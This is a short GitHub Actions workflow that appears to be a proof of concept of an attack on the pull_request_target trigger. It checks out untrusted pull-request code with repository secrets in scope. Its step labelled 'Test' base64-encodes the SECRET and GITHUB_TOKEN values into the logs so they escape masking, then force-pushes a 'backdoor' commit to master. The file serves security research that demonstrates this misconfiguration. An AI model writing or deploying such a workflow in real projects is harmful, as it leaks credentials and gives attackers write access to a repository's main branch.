name: CI

on: [pull_request_target]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{github.event.pull_request.head.ref}}
          repository: ${{github.event.pull_request.head.repo.full_name}}
      - name: Test
        env:
          SECRET: ${{ secrets.SECRET }}
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          echo $SECRET | base64
          echo $GITHUB_TOKEN | base64
          git status
          git fetch origin
          git checkout -b master origin/master
          git config --global user.email "amlweems@gmail.com"
          git config --global user.name "Anthony Weems"
          git commit --allow-empty -m "backdoor"
          git push origin master -f
